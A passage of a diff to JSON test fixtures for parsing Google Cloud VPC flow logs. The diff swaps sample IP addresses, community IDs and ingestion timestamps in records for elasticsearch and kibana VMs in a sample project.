+ "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:59.740491697Z",
 "end": "2019-06-14T03:49:56.220599950Z",
@@ -11579,18 +11579,18 @@
 "as": {
 "number": 15169
 },
- "address": "203.0.113.134",
+ "address": "67.43.156.13",
 "port": 33692,
 "bytes": 66094,
 "domain": "kibana",
- "ip": "203.0.113.134",
+ "ip": "67.43.156.13",
 "packets": 360
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:ICaRxvQCM8Iv02SAaUpscf0dmFk=",
+ "community_id": "1:JliXl736rywggK/Xuo92yo5WPuY=",
 "bytes": 66094,
 "name": "default",
 "transport": "tcp",
@@ -11612,7 +11612,7 @@
 },
 "related": {
 "ip": [
- "203.0.113.134",
+ "67.43.156.13",
 "10.139.99.242"
 ]
 },
@@ -11649,8 +11649,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868849100Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391792200Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:00.558259934Z",
 "end": "2019-06-14T03:49:59.565137912Z",
@@ -11679,17 +11679,17 @@
 "as": {
 "number": 33652
 },
- "address": "203.0.113.58",
+ "address": "67.43.156.13",
 "port": 65262,
 "bytes": 4900,
- "ip": "203.0.113.58",
+ "ip": "67.43.156.13",
 "packets": 542
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:RtfThXVVNPvXxMgtvtqlB4QmIlQ=",
+ "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=",
 "bytes": 4900,
 "transport": "tcp",
 "type": "ipv4",
@@ -11703,7 +11703,7 @@
 },
 "related": {
 "ip": [
- "203.0.113.58",
+ "67.43.156.13",
 "10.139.99.242"
 ]
 },
@@ -11725,8 +11725,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868852100Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391796700Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:00.251430011Z",
 "end": "2019-06-14T03:49:56.220741828Z",
@@ -11747,9 +11747,9 @@
 "as": {
 "number": 15169
 },
- "address": "198.51.100.107",
+ "address": "67.43.156.14",
 "port": 52328,
- "ip": "198.51.100.107"
+ "ip": "67.43.156.14"
 },
 "source": {
 "address": "10.87.40.76",
@@ -11763,7 +11763,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:EE4Jx/GklVta9XikBj43wQU3qJM=",
+ "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=",
 "bytes": 1781,
 "transport": "tcp",
 "type": "ipv4",
@@ -11778,7 +11778,7 @@
 "related": {
 "ip": [
 "10.87.40.76",
- "198.51.100.107"
+ "67.43.156.14"
 ]
 },
 "gcp": {
@@ -11802,8 +11802,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868855200Z", - "original": "{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391802200Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:42:20.842840991Z", "end": "2019-06-14T03:42:20.952481728Z", @@ -11830,18 +11830,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33552, "bytes": 63280, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 361 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:r7WME9xMisADgziCEygFYe5e1kY=", + "community_id": "1:RgpWxKDKI4bxYgUqX3Z0ZpipsO4=", "bytes": 63280, "name": "default", "transport": "tcp", @@ -11863,7 +11863,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -11900,8 +11900,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868858200Z", - "original": "{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391807700Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", "end": "2019-06-14T03:49:55.213081491Z", @@ -11924,9 +11924,9 @@ "as": { "number": 24940 }, - "address": "198.51.100.239", + "address": "67.43.156.14", "port": 37292, - "ip": "198.51.100.239" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -11940,7 +11940,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:qQCuSUtf/LXRt0TJF/oFikmD5p4=", + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", "bytes": 774029, "transport": "tcp", "type": "ipv4", @@ -11955,7 +11955,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.239" + "67.43.156.14" ] }, "gcp": { 
@@ -11979,8 +11979,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868861300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"198.51.100.239\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391812600Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", "end": "2019-06-14T03:49:35.841633589Z", @@ -12007,18 +12007,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 359272, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 66 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RJ5OB/OF2Dh8aqt0X5ikvUiYbOE=", + "community_id": "1:OhbIPr/28Fsp+gsHSdoT+T8vBZA=", "bytes": 359272, "name": "default", "transport": "tcp", @@ -12040,7 +12040,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -12074,8 +12074,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868864300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391817Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", "end": "2019-06-14T03:49:37.933338264Z", @@ -12104,17 +12104,17 @@ "as": { "number": 24940 }, - "address": "198.51.100.239", + "address": "67.43.156.14", "port": 37292, "bytes": 310476, - "ip": "198.51.100.239", + "ip": "67.43.156.14", "packets": 214 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:qQCuSUtf/LXRt0TJF/oFikmD5p4=", + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", "bytes": 310476, "transport": "tcp", "type": "ipv4", @@ -12128,7 +12128,7 @@ }, "related": { "ip": [ - "198.51.100.239", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -12153,8 +12153,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868867400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.239\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391822500Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", "end": "2019-06-14T03:49:35.841633589Z", @@ -12175,9 +12175,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 59790, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -12191,7 +12191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2VaSImZuAKUa2JwnaG4ATyMe4g0=", + "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -12206,7 +12206,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -12230,8 +12230,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868874600Z", - "original": "{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391826900Z", + "original": 
"{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"